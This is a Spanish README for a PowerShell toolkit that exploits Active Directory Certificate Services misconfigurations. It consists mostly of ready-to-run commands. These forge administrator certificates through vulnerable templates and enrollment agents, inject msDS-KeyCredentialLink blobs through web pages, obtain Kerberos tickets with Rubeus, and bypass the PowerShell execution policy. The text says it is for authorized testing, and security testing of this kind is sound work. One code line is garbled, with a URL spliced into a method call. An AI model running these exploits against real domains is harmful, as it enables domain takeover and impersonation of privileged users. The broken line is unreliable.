
AD CS: material relacionado con la explotación va aquí
Certi-Bhai es una colección completa de herramientas de explotación en PowerShell para atacar vulnerabilidades de Servicios de Certificados de Active Directory (AD CS). Este kit implementa varios Escenarios de Escalada (ESC) que demuestran configuraciones de seguridad críticas erróneas en entornos ADCS.
Los Servicios de Certificados de Active Directory (AD CS) a menudo están mal configurados, creando múltiples vectores de ataque. Certi-Bhai proporciona scripts de explotación prácticos y utilidades para pruebas de seguridad e investigación de vulnerabilidades comunes de ADCS.
Úselo de manera responsable y solo en entornos de prueba autorizados.
# Módulo de Active Directory (opcional, para funcionalidad mejorada)
Import-Module ActiveDirectory
Vulnerabilidad: Las plantillas de certificados permiten la inscripción con valores arbitrarios de SubjectAltName (SAN).
Qué hace: Crea un certificado firmado por una plantilla excesivamente permisiva, lo que le permite hacerse pasar por cualquier usuario o equipo en el dominio.
Uso:
# Navegue al directorio ESC1
cd ESC1
# Ejecute el script de explotación
.
\esc1.ps1 -subjectName "CN=administrator,CN=Users,DC=indishell,DC=lab" `
-templateName "vuln" `
-altName "administrator" `
-pfxPass "password123"
Parámetros:
-subjectName: Nombre distinguido (DN) completo del usuario objetivo-templateName: Nombre de la plantilla de certificado vulnerable-altName: Nombre alternativo a solicitar (usuario/equipo)-pfxPass: Contraseña para la exportación PFXSalida: Certificado PFX codificado en Base64 para usar con herramientas como Rubeus
Tutorial en Video: https://www.youtube.com/watch?v=l0gMw_mO4dw
Vulnerabilidad: Los Agentes de Solicitud de Certificados pueden solicitar certificados en nombre de cualquier usuario.
Qué hace: Inscribe un certificado como Agente de Solicitud de Certificados y luego solicita certificados para entidades arbitrarias.
Uso:
# Navegue al directorio ESC3
cd ESC3
# Ejecute el script de explotación
.
\esc3_working.ps1 -templateName "CEOTemplate" `
-target_user "administrator" `
-domain "INDISHELL" `
-pfxPass "password123"
Parámetros:
-templateName: Plantilla de agente de solicitud vulnerable-target_user: Entidad para la cual solicitar el certificado-domain: Nombre del dominio-pfxPass: Contraseña del PFXSalida: Certificado de administrador (PFX) con codificación base64
Tutorial en Video: https://www.youtube.com/watch?v=fGjrM-JKnoM
Vulnerabilidad: Inyección de Política de Aplicación.
cd CSR_Generate
# Genere una solicitud de firma de certificado
.
\csr_short.ps1 -subjectName "CN=admin,CN=Users,DC=domain,DC=local" `
-altName "admin"
# Enviar CSR a la CA
.
\csr_submit.ps1 -csr $csr `
-templateName "User" `
-caServer "ca-server.domain.local"
La interfaz web cert.aspx proporciona un formulario fácil de usar para solicitar un certificado desde el endpoint RPC de AD CS:
http://your-iis-server/cert.aspx
Modifique atributos LDAP a través de la interfaz web. Este script se utiliza básicamente para realizar la inyección de blob en el atributo msDS-KeyCredentialLink:
http://your-iis-server/ldap_update.aspx
Características:
.
\ESC1/esc1.ps1 -subjectName "CN=admin,CN=Users,DC=indishell,DC=lab" `
-templateName "User" `
-altName "administrator" `
-pfxPass "P@ssw0rd!"
# Convierta PFX a un formato utilizable para Rubeus
$cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate2("cert.pfx", "password")
[Convert]:https://raw.githubusercontent.com/incredibleindishell/certi-bhai/main/:ToBase64String($cert.RawData)
Rubeus.exe asktgt /user:administrator /certificate:$base64cert /nowrap
P: La ejecución del script está bloqueada
# Ejecute PowerShell como Administrador
Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope Process
P: Plantilla de certificado no encontrada
P: La conexión LDAP falla
¿Encontró un problema o tiene mejoras? Por favor, repórtelo de manera responsable.